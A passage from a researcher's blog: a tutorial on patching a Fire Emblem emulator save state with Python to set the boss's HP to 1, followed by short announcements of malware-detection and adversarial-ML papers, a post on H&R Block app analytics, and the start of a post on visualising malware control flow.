00000030 00 00 00 00 d8 7d 00 03 00 00 00 00 00 00 00 00 |.....}..........|
00000040 00 00 00 00 1f 00 00 00 00 00 00 04 a0 7f 00 03 |................|
00000050 14 02 00 00 1c 00 00 00 12 00 00 60 1f 00 00 60 |...........`...`|
00000060 a0 7f 00 03 14 02 00 00 1f 00 00 60 00 00 00 00 |...........`....|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 c0 7d 00 03 0c 02 00 00 d0 7f 00 03 70 fa 0b 08 |.}..........p...|
00000090 3f 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 |?..`............|
</code></pre></div>
<p>Another lucky break for us. Near the beginning of the data we can see the game's internal title (<code>FIREEMBLEME</code>) followed by its game code (<code>AE7E</code>). In fact, if we search
the game's ROM (the program as it's stored when it isn't running), we'll find the same bytes in its cartridge header near the beginning of the file:</p>
<div class="highlight"><pre><span></span><code>$ hexdump -C Fire\ Emblem\ \(U\).gba | grep -A 10 "FIREEMBLEM"
000000a0 46 49 52 45 45 4d 42 4c 45 4d 45 00 41 45 37 45 |FIREEMBLEME.AE7E|
000000b0 30 31 96 00 00 00 00 00 00 00 00 00 00 d1 00 00 |01..............|
000000c0 12 00 a0 e3 00 f0 29 e1 28 d0 9f e5 1f 00 a0 e3 |......).(.......|
000000d0 00 f0 29 e1 18 d0 9f e5 3c 11 9f e5 18 00 8f e2 |..).....<.......|
000000e0 00 00 81 e5 34 11 9f e5 0f e0 a0 e1 11 ff 2f e1 |....4........./.|
000000f0 f2 ff ff ea 00 7e 00 03 a0 7f 00 03 01 33 a0 e3 |.....~.......3..|
00000100 02 3c 83 e2 00 20 93 e5 02 18 a0 e1 21 18 a0 e1 |.<... ......!...|
00000110 00 00 4f e1 0b 40 2d e9 22 18 02 e0 02 0a 11 e2 |..O..@-.".......|
00000120 fe ff ff 1a 00 20 a0 e3 01 00 11 e2 26 00 00 1a |..... ......&...|
00000130 04 20 82 e2 02 00 11 e2 23 00 00 1a 04 20 82 e2 |. ......#.... ..|
00000140 04 00 11 e2 20 00 00 1a 04 20 82 e2 08 00 11 e2 |.... .... ......|
</code></pre></div>
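<p>Those bytes aren't arbitrary: a GBA ROM begins with a cartridge header that stores a 12-byte title at offset <code>0xA0</code> and a 4-byte game code at <code>0xAC</code>, which is exactly where <code>FIREEMBLEME</code> and <code>AE7E</code> appear in the ROM dump. Here is a rough sketch for pulling those fields out of a ROM and locating them in a decompressed state (the helper names are hypothetical):</p>

```python
import struct


def parse_gba_header(rom):
    """Return (title, game_code) from a GBA ROM's cartridge header."""
    # 12-byte NUL-padded title at 0xA0, followed by a 4-byte game code at 0xAC.
    title, code = struct.unpack_from("12s4s", rom, 0xA0)
    return title.rstrip(b"\x00").decode("ascii"), code.decode("ascii")


def find_all(data, needle):
    """Return every offset where `needle` occurs in `data`."""
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets
```

<p>Based on the two hexdumps, searching the decompressed state for the 16 header bytes <code>rom[0xA0:0xB0]</code> (the title, its NUL padding, then <code>AE7E</code>) should turn up offset 4.</p>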
<p>This strongly suggests that, once decompressed, the data file stores the game's memory as plain, unencoded bytes. Next, we have to figure out which bytes
to overwrite in this 723 KB file.</p>
<h2>Differential Analysis</h2>
<p>The simplest reverse engineering technique for finding a data variable of interest is differential analysis. Remember that our goal is to
modify the health of the final boss for an easy victory. It's reasonable to assume that somewhere in the program's memory, there's an
integer that keeps track of the current health. Also, since the game is actively running, this variable shouldn't be relocated in memory too
often. The question is: how do we find it?</p>
<p>We'll use differential analysis. Specifically, we'll save the game's state, inflict some damage on the boss, save the new state, inflict more
damage, save and so forth. Since this game shows the HP value and the damage of our attacks, we should know the exact health of the boss at
each state we save. All we need to do then is compare the memory of the states and find a location that contains the correct health value across
all the states.</p>
<h3>Creating Save States</h3>
<p>So let's begin. It's time to confront the big bad dragon at the end of Fire Emblem 7:</p>
<p><center>
<img alt="Figure 2" src="https://carteryagemann.com/images/fire-emblem-1.png">
</center></p>
<p>This overgrown lizard is quite the challenge if you approach him underleveled and without enough good equipment, but rather than working harder
by reloading a past save and redoing half the chapters, we're going to work smarter and show the boss who the real master of this game universe
is!</p>
<p>At our first save state, he's at full health. Unfortunately, this game is cheeky and hides his HP at the start of the fight:</p>
<p><center>
<img alt="Figure 3" src="https://carteryagemann.com/images/fire-emblem-2.png">
</center></p>
<p>This won't be a problem though because the game shows exactly how much damage we inflict:</p>
<p><center>
<img alt="Figure 4" src="https://carteryagemann.com/images/fire-emblem-3.png">
</center></p>
<p>In this case, Eliwood's sword will inflict 21 damage. He's seriously underpowered, but can still survive the attack:</p>
<p><center>
<img alt="Figure 5" src="https://carteryagemann.com/images/fire-emblem-4.png">
</center></p>
<p>At this point, we make our second save state and note that we've inflicted 21 damage so far. As Athos prepares to cast magic on the foul beast,
we can now see the HP of the boss:</p>
<p><center>
<img alt="Figure 6" src="https://carteryagemann.com/images/fire-emblem-5.png">
</center></p>
<p>He had 99 HP when the second save was made, meaning he started with 120. Now Athos inflicts another 20 damage:</p>
<p><center>
<img alt="Figure 7" src="https://carteryagemann.com/images/fire-emblem-6.png">
</center></p>
<p>And we make a third save state. The HP of the boss at this save is 79:</p>
<p><center>
<img alt="Figure 8" src="https://carteryagemann.com/images/fire-emblem-7.png">
</center></p>
<p>Three states should be enough for our analysis, so it's time to transfer the data over to a computer and get hacking.</p>
<h3>The Analysis</h3>
<p>As I mentioned earlier, this is a differential analysis. We're looking for a memory location storing a variable that's 120 in the first state,
99 in the second and 79 in the third. In base 16, this is <code>0x78</code>, <code>0x63</code> and <code>0x4f</code>. Luckily, all these values are small enough to be encoded as
a single byte, so we can scan the game's memory linearly without having to consider factors like <a href="https://en.wikipedia.org/wiki/Data_structure_alignment">alignment</a>
or <a href="https://en.wikipedia.org/wiki/Endianness">endianness</a>. So let's get to work.</p>
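<p>If the HP values had been larger than 255, a single-byte scan would no longer be enough. Since the GBA's ARM CPU is little-endian, a 16-bit value of 120 would be stored as <code>78 00</code>. Below is a sketch of a width- and alignment-aware search; the widths and alignment are assumptions you would have to guess for a given game.</p>

```python
import struct

# struct format codes for little-endian unsigned integers, keyed by width in bytes.
FORMATS = {1: "<B", 2: "<H", 4: "<I"}


def find_value(data, value, width=1, align=1):
    """Offsets (multiples of `align`) where `value` is stored as a `width`-byte LE integer."""
    pattern = struct.pack(FORMATS[width], value)
    return [off for off in range(0, len(data) - width + 1, align)
            if data[off:off + width] == pattern]


print([hex(hp) for hp in (120, 99, 79)])  # ['0x78', '0x63', '0x4f']
```

<p>With the defaults <code>width=1</code> and <code>align=1</code>, this reduces to the byte-by-byte scan used in the script that follows.</p>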
<p>To speed up this analysis, I wrote a script in Python. This code is compatible with Python 2 and 3 and the comments are
self-explanatory:</p>
<div class="highlight"><pre><span></span><code><span class="c1">#!/usr/bin/env python</span>
<span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span>
<span class="kn">import</span> <span class="nn">gzip</span>
<span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">unpack</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">def</span> <span class="nf">decode_gzip</span><span class="p">(</span><span class="n">filepath</span><span class="p">):</span>
    <span class="c1"># Python 2 and 3 decode byte I/O differently, this method ensures consistency</span>
    <span class="k">with</span> <span class="n">gzip</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">version_info</span><span class="o">.</span><span class="n">major</span> <span class="o"><=</span> <span class="mi">2</span><span class="p">:</span>
            <span class="k">return</span> <span class="p">[</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'B'</span><span class="p">,</span> <span class="n">byte</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()]</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="c1"># the names for my save state data files</span>
<span class="n">files</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Fire Emblem (U).jg1'</span><span class="p">,</span>
         <span class="s1">'Fire Emblem (U).jg2'</span><span class="p">,</span>
         <span class="s1">'Fire Emblem (U).jg3'</span><span class="p">]</span>
<span class="c1"># the expected HP value in each save state</span>
<span class="n">hps</span> <span class="o">=</span> <span class="p">[</span><span class="mi">120</span><span class="p">,</span> <span class="mi">99</span><span class="p">,</span> <span class="mi">79</span><span class="p">]</span>
<span class="c1"># decompress the save states</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">decode_gzip</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">files</span><span class="p">]</span>
<span class="c1"># for each save state, find all the offsets that contain the expected HP value</span>
<span class="c1"># this is not the most efficient way of doing intersection search, but it's easier</span>
<span class="c1"># to read and efficient enough for our amount of data</span>
<span class="n">match_sets</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
<span class="k">for</span> <span class="n">state</span><span class="p">,</span> <span class="n">hp</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">hps</span><span class="p">):</span>
    <span class="n">matches</span> <span class="o">=</span> <span class="p">[</span><span class="n">offset</span> <span class="k">for</span> <span class="n">offset</span><span class="p">,</span> <span class="n">byte</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="k">if</span> <span class="n">byte</span> <span class="o">==</span> <span class="n">hp</span><span class="p">]</span>
    <span class="n">match_sets</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">matches</span><span class="p">))</span>
<span class="c1"># we want the intersecting offsets across save states</span>
<span class="n">intersection</span> <span class="o">=</span> <span class="n">match_sets</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">intersection</span><span class="p">(</span><span class="o">*</span><span class="n">match_sets</span><span class="p">[</span><span class="mi">1</span><span class="p">:])</span>
<span class="c1"># sort and print the results</span>
<span class="n">offsets</span> <span class="o">=</span> <span class="p">[</span><span class="nb">hex</span><span class="p">(</span><span class="n">offset</span><span class="p">)</span> <span class="k">for</span> <span class="n">offset</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="nb">list</span><span class="p">(</span><span class="n">intersection</span><span class="p">))]</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">' '</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">offsets</span><span class="p">))</span>
</code></pre></div>
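<p>As the script's comments admit, building a full match set for every state does more work than necessary. One possible refinement, sketched below and assuming the same gzip-compressed state files, collects candidates from the first state only and then re-checks just the surviving offsets in each later state, so the candidate set can only shrink:</p>

```python
import gzip


def narrow_candidates(paths, expected):
    """Return sorted offsets whose byte equals the expected value in every state."""
    candidates = None
    for path, value in zip(paths, expected):
        with gzip.open(path, "rb") as fd:
            state = bytearray(fd.read())  # bytearray indexes to ints on Python 2 and 3
        if candidates is None:
            # First state: every offset holding the value is a candidate.
            candidates = {off for off, byte in enumerate(state) if byte == value}
        else:
            # Later states: only re-check offsets that survived so far.
            candidates = {off for off in candidates
                          if off < len(state) and state[off] == value}
    return sorted(candidates or [])
```

<p>Called as <code>narrow_candidates(files, hps)</code> with the same lists as the script above, it should return the same offsets, just sorted as integers.</p>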
<p>Running the search on my states yields three candidate locations:</p>
<div class="highlight"><pre><span></span><code>$ python search.py
0x29222 0x354b2 0x91df3
</code></pre></div>
<p>It's common to get more than one candidate because depending on the game's logic, values like health might be maintained in multiple locations for
different purposes (e.g. for rendering it as text on the screen, detecting certain state triggers, etc.). As long as there are only a few results,
it's usually safe to just overwrite all of them. If the game crashes, we can always go back and patch the candidates more conservatively, one at a time.</p>
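<p>If patching every candidate at once does crash the game, one conservative fallback is to produce a separate patched state per candidate and try them individually. A minimal sketch; the helper name and the <code>.patched-</code> plus hex offset naming scheme are illustrative choices, not anything John GBA expects:</p>

```python
import gzip


def patch_each(state_path, value, offsets):
    """Write one patched copy of a gzip'd state per offset; return the new paths."""
    with gzip.open(state_path, "rb") as fd:
        original = bytearray(fd.read())
    outputs = []
    for off in offsets:
        data = bytearray(original)  # fresh copy so each file differs in one byte only
        data[off] = value
        out_path = "%s.patched-%x" % (state_path, off)  # hypothetical naming scheme
        with gzip.open(out_path, "wb") as fd:
            fd.write(bytes(data))
        outputs.append(out_path)
    return outputs
```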
<h3>Modifying a Save State</h3>
<p>Now that we know where to make our modifications, let's set the health of the boss to 1 HP! Here's another Python script to do just that:</p>
<div class="highlight"><pre><span></span><code><span class="c1">#!/usr/bin/env python</span>
<span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span>
<span class="kn">import</span> <span class="nn">gzip</span>
<span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">unpack</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">def</span> <span class="nf">decode_gzip</span><span class="p">(</span><span class="n">filepath</span><span class="p">):</span>
    <span class="c1"># Python 2 and 3 decode byte I/O differently, this method ensures consistency</span>
    <span class="k">with</span> <span class="n">gzip</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">version_info</span><span class="o">.</span><span class="n">major</span> <span class="o"><=</span> <span class="mi">2</span><span class="p">:</span>
            <span class="k">return</span> <span class="nb">bytearray</span><span class="p">([</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'B'</span><span class="p">,</span> <span class="n">byte</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()])</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">4</span><span class="p">:</span>
    <span class="nb">print</span><span class="p">(</span><span class="s2">"Usage:"</span><span class="p">,</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"<state_file.jg#> <patch_value> <offset> [<offset> ...]"</span><span class="p">)</span>
    <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># parse the command line arguments</span>
<span class="n">state_file</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">patch_value</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">offsets</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="k">for</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">3</span><span class="p">:]]</span>
<span class="c1"># read in the save state data</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">decode_gzip</span><span class="p">(</span><span class="n">state_file</span><span class="p">)</span>
<span class="c1"># overwrite the designated bytes</span>
<span class="k">for</span> <span class="n">offset</span> <span class="ow">in</span> <span class="n">offsets</span><span class="p">:</span>
    <span class="n">data</span><span class="p">[</span><span class="n">offset</span><span class="p">]</span> <span class="o">=</span> <span class="n">patch_value</span>
<span class="c1"># write the new save state</span>
<span class="k">with</span> <span class="n">gzip</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">state_file</span> <span class="o">+</span> <span class="s1">'.patched'</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
    <span class="n">fd</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">data</span><span class="p">))</span>
</code></pre></div>
<p>Now we just apply the patch:</p>
<div class="highlight"><pre><span></span><code>$ python patch.py Fire\ Emblem\ \(U\).jg1 0x01 0x29222 0x354b2 0x91df3
</code></pre></div>
<p>This creates a new save state named after the original with the suffix <code>.patched</code> appended. All that's left is to copy it back to the device under the
original filename (replacing the save state John GBA loads), and then we're ready to slay a dragon with ease.</p>
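<p>Before copying the file back, it's worth a quick sanity check that the patch touched only the bytes we intended. A small sketch (the helper name is hypothetical) that decompresses both states and lists every differing byte:</p>

```python
import gzip


def diff_states(original_path, patched_path):
    """Return (offset, old, new) for each byte that differs between two gzip'd states."""
    with gzip.open(original_path, "rb") as fd:
        old = bytearray(fd.read())
    with gzip.open(patched_path, "rb") as fd:
        new = bytearray(fd.read())
    if len(old) != len(new):
        raise ValueError("state sizes differ: %d vs %d" % (len(old), len(new)))
    return [(off, a, b) for off, (a, b) in enumerate(zip(old, new)) if a != b]
```

<p>For the patch above, we'd expect exactly three entries, one per candidate offset, each changing <code>0x78</code> (120) to <code>0x01</code>.</p>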
<h2>The Result</h2>
<p>Not so tough now, are we dragon?</p>
<p><center>
<img alt="Figure 9" src="https://carteryagemann.com/images/fire-emblem-8.png">
</center></p>
<p>And down it goes in one hit. How embarrassing:</p>
<p><center>
<img alt="Figure 10" src="https://carteryagemann.com/images/fire-emblem-9.png">
</center></p>
<p><center>
<img alt="Figure 11" src="https://carteryagemann.com/images/fire-emblem-10.png">
</center></p>
<h2>Conclusion</h2>
<p>So that's the most basic approach to hacking a video game save state. I hope you've found this guide entertaining and informative. I'd like
to reemphasize that this only scratches the surface of the broad area that is reverse engineering. The beauty of differential analysis is that
we didn't have to know any low-level details about how the Game Boy Advance hardware behaves or the game's logic. This makes differential
analysis one of the most transferable techniques. That said, it also has limited applicability. For example, if the game developers wanted
to prevent tampering, even the most basic obfuscation (e.g. doubling every integer before storing it in memory) would thwart our analysis.
There are also fun hacks that cannot be implemented via a one-time memory patch (e.g. giving your character invincibility). So if you find
this topic interesting, I recommend checking out other tutorials floating around on the internet.</p>
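<p>To illustrate the obfuscation point with a toy example: suppose a hypothetical game stores HP doubled. The naive search then finds nothing, and it only succeeds again if we happen to guess the right transformation. The sketch below uses made-up five-byte "states" with the value at offset 3:</p>

```python
def find_candidates(states, expected, encode=lambda v: v):
    """Offsets whose byte equals encode(value) in every state (one value per state)."""
    match_sets = [
        {off for off, byte in enumerate(state) if byte == encode(value)}
        for state, value in zip(states, expected)
    ]
    return sorted(set.intersection(*match_sets)) if match_sets else []


# Made-up states for a hypothetical game that stores HP * 2 at offset 3.
hps = [120, 99, 79]
states = [bytes([0, 0, 0, 2 * hp, 0]) for hp in hps]

print(find_candidates(states, hps))                          # []
print(find_candidates(states, hps, encode=lambda v: 2 * v))  # [3]
```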
<p>Thanks for reading and happy hacking.</p>MLSploit Extended Abstract to Appear in KDD 20192019-06-11T09:30:00-04:002019-06-11T09:30:00-04:00Carter Yagemanntag:carteryagemann.com,2019-06-11:/kdd-19.html<p>My coauthors and I will be presenting an extended abstract in the <a href="https://www.kdd.org/kdd2019/">25th Conference on Knowledge Discovery and Data Mining</a> (KDD'19)
in August.
Below is a preview:</p>
<p><strong>Title:</strong> MLsploit: A Framework for Interactive Experimentation with Adversarial Machine Learning Research</p>
<p><strong>Authors:</strong> Nilaksh Das, Siwei Li, Chanil Jeon, Jinho Jung, Shang-Tse Chen, Carter Yagemann, Evan
Downing, Haekyu Park, Evan Yang, Li Chen, Michael Kounavis, Ravi Sahita, David
Durham, Scott Buck, Polo Chau, Taesoo Kim, Wenke Lee</p>
<p><strong>Abstract:</strong> We present MLsploit, the first user-friendly, cloud-based system that enables researchers and practitioners to rapidly evaluate and compare state-of-the-art adversarial attacks and defenses for machine learning (ML) models. As recent advances in adversarial ML have revealed that many ML techniques are highly vulnerable to adversarial attacks, MLsploit meets the urgent need for practical tools that facilitate interactive security testing of ML models. MLsploit is jointly developed by researchers at Georgia Tech and Intel, and is <a href="https://mlsploit.github.io">open-source</a>. Designed for extensibility, MLsploit accelerates the study and development of secure ML systems for safety-critical applications. In this showcase demonstration, we highlight the versatility of MLsploit in performing fast-paced experimentation with adversarial ML research that spans a diverse set of modalities, such as bypassing Android and Linux malware, or attacking and defending deep learning models for image classification. We invite the audience to perform experiments interactively in real time by varying different parameters of the experiments or using their own samples, and finally compare and evaluate the effects of such changes on the performance of the ML models through an intuitive user interface, all without writing any code.</p>Barnum Paper to Appear in Information Security Conference 2019 (ISC'19)2019-06-08T15:30:00-04:002019-06-08T15:30:00-04:00Carter Yagemanntag:carteryagemann.com,2019-06-08:/isc-19.html<p>My coauthors and I will be presenting a paper in the <a href="https://isc2019.cs.stonybrook.edu/">22nd Information Security Conference</a> (ISC'19)
in September.
Below is a preview:</p>
<p><strong><a href="https://carteryagemann.com/pages/barnum.html">Project Page</a></strong></p>
<p><strong>Title:</strong> Barnum: Detecting Document Malware via Control Flow Anomalies in Hardware Traces.</p>
<p><strong>Authors:</strong> Carter Yagemann (Georgia Tech), Salmin Sultana (Intel Labs), Li Chen (Intel Labs), Wenke Lee (Georgia Tech).</p>
<p><strong>Abstract:</strong> This paper proposes Barnum, an offline control flow attack detection system that applies deep learning
on hardware execution traces to model a program's behavior and detect control flow anomalies.
Our implementation analyzes document readers to detect exploits and ABI abuse.
Recent work has proposed using deep learning based control flow classification to build more
robust and scalable detection systems.
These proposals, however, were not evaluated against different kinds of control flow attacks,
programs, and adversarial perturbations.</p>
<p>We investigate anomaly detection approaches to improve the security coverage and scalability of
control flow attack detection. Barnum is an end-to-end system consisting of three major components:
1) trace collection, 2) behavior modeling, and 3) anomaly detection via binary classification.
It utilizes Intel<sup>®</sup> Processor Trace for low overhead execution tracing and
applies deep learning on the basic block sequences reconstructed from the trace to train a normal program behavior model.
Based on the path prediction accuracy of the model, Barnum then determines a decision boundary to classify benign vs. malicious executions.</p>
<p>We evaluate against 8 families of attacks to Adobe Acrobat Reader and 9 to Microsoft Word on Windows 7.
Both readers are complex programs with over 50 dynamically linked libraries, just-in-time compiled code
and frequent network I/O. Barnum shows its effectiveness with <strong>0% false positive</strong> and <strong>2.4% false negative</strong>
on a dataset of 1,250 benign and 1,639 malicious PDFs.
Barnum is robust against evasion techniques as it successfully detects 500 adversarially perturbed PDFs.</p>Extended Abstract to Appear in CVPR-19 Workshop on Explainable AI2019-04-26T17:00:00-04:002019-04-26T17:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-04-26:/cvpr-19-xai.html<p>My coauthors and I will be presenting an extended abstract in the workshop on
<a href="https://explainai.net/">Explainable AI</a> at <a href="http://cvpr2019.thecvf.com/">CVPR 2019</a> in June.
Below is a preview:</p>
<p><strong>Title:</strong> To believe or not to believe: Validating explanation fidelity for dynamic malware analysis.</p>
<p><strong>Authors:</strong> Li Chen (Intel Labs), Carter Yagemann (Georgia Tech), Evan Downing (Georgia Tech).</p>
<p><strong>Abstract:</strong> Converting malware into images followed by vision-based deep learning algorithms has shown superior threat detection efficacy compared with classical machine learning algorithms. When malware are visualized as images, visual-based interpretation schemes can also be applied to extract insights of why individual samples are classified as malicious. In this work, via two case studies of dynamic malware classification, we extend the local interpretable model-agnostic explanation algorithm to explain image-based dynamic malware classification and examine the interpretation fidelity. For both case studies, we first train deep learning models via transfer learning on malware images, demonstrate high classification effectiveness, apply an explanation method on the images, and correlate the results back to the samples to validate whether the algorithmic insights are consistent with security domain expertise. In our first case study, the interpretation framework identifies indirect calls that uniquely characterize the underlying exploit behavior of a malware family. In our second case study, the interpretation framework extracts insightful information such as cryptography-related APIs when applied on images created from API existence, but generate ambiguous interpretation on images created from API sequences and frequencies. Our findings indicate that current image-based interpretation techniques are promising for vision-based malware classification. We continue to develop image-based interpretation schemes specifically for security applications.</p>H&R Block App Analytics for 20192019-04-12T13:00:00-04:002019-04-12T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-04-12:/hrb-analytics-2019.html<p>Last year I wrote a <a href="https://carteryagemann.com/hrb-analytics.html">blog post</a> about using
the analytics publicly released by the USA government to glean some information
about H&R Block's mobile apps. If you haven't read it, I recommend doing so
because in this post I'm going to give an update for the 2019 tax year.</p>
<p>I haven't changed the code or data source, so check the original blog post for
those. As I previously mentioned, I've been collecting this data since 2016
and I'm happy to share it upon request.</p>
<h2>Results</h2>
<p>Here are the results for 2019, in no particular order:</p>
<ul>
<li>From January 13 through April 11, <strong>497</strong> requests were made by MyBlock and <strong>334,960</strong> by Taxes.</li>
<li><strong>322,749</strong> requests were made from phones while <strong>12,708</strong> were made from tablets; about
<strong>96%</strong> of the requests were phones.</li>
<li><strong>100%</strong> of requests were made by devices running iOS.</li>
<li>Three versions of MyBlock appear in the dataset: <strong>6.6.0</strong>, <strong>6.8.0</strong>, and <strong>7.0.1</strong>.</li>
<li>Seven versions of Taxes appear in the dataset: <strong>7.7.1</strong>, <strong>7.8.0</strong>, <strong>8.1.0</strong>, <strong>8.2.0</strong>, <strong>8.3.0</strong>, <strong>8.5.0</strong>, and <strong>8.6.0</strong>.</li>
<li><strong>100%</strong> of requests contain "Mozilla" in the user-agent.</li>
</ul>
<p>And the security question from the original blog post:</p>
<ul>
<li><strong>197,548</strong> requests used TouchID, <strong>88,094</strong> FaceID,
and <strong>49,815</strong> showed neither keyword;
<strong>59%</strong>, <strong>26%</strong>, and <strong>15%</strong>, respectively.</li>
</ul>
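<p>The percentages above follow directly from the raw counts. A quick Python 3 sketch to recompute them, and to confirm that all three breakdowns cover the same total number of requests:</p>

```python
# Request counts from the bullet lists above.
by_app = {"MyBlock": 497, "Taxes": 334960}
by_device = {"phone": 322749, "tablet": 12708}
by_auth = {"TouchID": 197548, "FaceID": 88094, "neither": 49815}


def shares(counts):
    """Each category's share of the total, rounded to a whole percent."""
    total = sum(counts.values())
    return {name: round(100 * n / total) for name, n in counts.items()}


# Every breakdown should describe the same population of requests.
print({sum(c.values()) for c in (by_app, by_device, by_auth)})  # {335457}
print(shares(by_device))  # {'phone': 96, 'tablet': 4}
print(shares(by_auth))    # {'TouchID': 59, 'FaceID': 26, 'neither': 15}
```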
<h2>Comparison to 2018</h2>
<ul>
<li>Whereas in 2018 the vast majority of requests were made by MyBlock, in 2019 almost all requests were made by Taxes.</li>
<li>No requests by Android devices appear in 2019.</li>
<li>The change in share for TouchID, FaceID, and neither is <strong>-15</strong>, <strong>+19</strong>, and <strong>-4</strong> percentage points, respectively.</li>
</ul>
<h2>Discussion</h2>
<p>It's interesting that no requests were made from Android devices in 2019.
The MyBlock app is listed on the <a href="https://play.google.com/store/apps/details?id=com.hrblock.blockmobile">Play store</a>,
so why don't they appear in the data? One possibility is they no longer use a special user agent. Another is
they no longer communicate with a USA government website contained in the public analytic data. It's hard to know
for certain what the root cause is.</p>
<p>We can also see that FaceID usage is rising at the expense of both other categories. This implies that conversions came
from existing TouchID users as well as from new adopters. The shift makes sense as more FaceID-compatible phones reach customers'
hands. It'll be interesting to see if this trend continues in 2020 or if the adoption of Apple's biometric features reaches premature saturation.</p>Android Intent Firewall Documentation2019-04-06T10:00:00-04:002019-04-06T10:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-04-06:/intent-firewall-doc.html<p>A while ago I was notified that the <a href="https://web.archive.org/web/20180621163836/http://www.cis.syr.edu/~wedu/android/IntentFirewall/">documentation</a>
on Android's Intent Firewall that I wrote while I was a student at Syracuse University is no longer available. Surprisingly, despite how old the
document is, I still get requests for it. Thus, I've taken the time to make a copy of it on this website for preservation. You can access it
<a href="https://carteryagemann.com/pages/android-intent-firewall.html">here</a>.</p>Malware Has a Color2019-02-21T21:00:00-05:002019-02-21T21:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-02-21:/malware-colors.html<p>In an upcoming paper I plan to present some preliminary work in applying machine learning
to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate
how to use this to analyze document malware with promising accuracy. In
<a href="https://carteryagemann.com/doc-mal-categories.html">previous posts</a>, I've detailed the threat malicious documents
pose to users and shared some insights into why this problem remains prevalent. For this post,
I want to switch gears and share a fun technique I use to help understand
what the control flow anomaly detector is really seeing. Put playfully, I'm going to demonstrate how
to spot malware by the color it makes. Enjoy.</p>
<p>Without going into too many details about the system (I'll be sure to make a post about where to
find the paper and code when it becomes available), at a high level we collect and use execution traces of a target
program (e.g. Acrobat Reader) opening benign documents to create a path prediction
model. We then apply the model to an unlabeled trace, the intuition being that any anomalies
will cause a sudden drop in prediction accuracy. There's a little more to it than that, but this is the gist
of how the system operates.</p>
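<p>The real system has more to it than this, so treat the following purely as a toy illustration of the intuition. It swaps in a simple order-<em>k</em> history table (an assumption for illustration, not the model we actually use): trained on benign traces, it predicts each indirect branch target from the previous <em>k</em> targets, and a sliding window over its hits shows the accuracy collapse an anomaly would cause. All addresses are made up.</p>

```python
from collections import Counter, defaultdict


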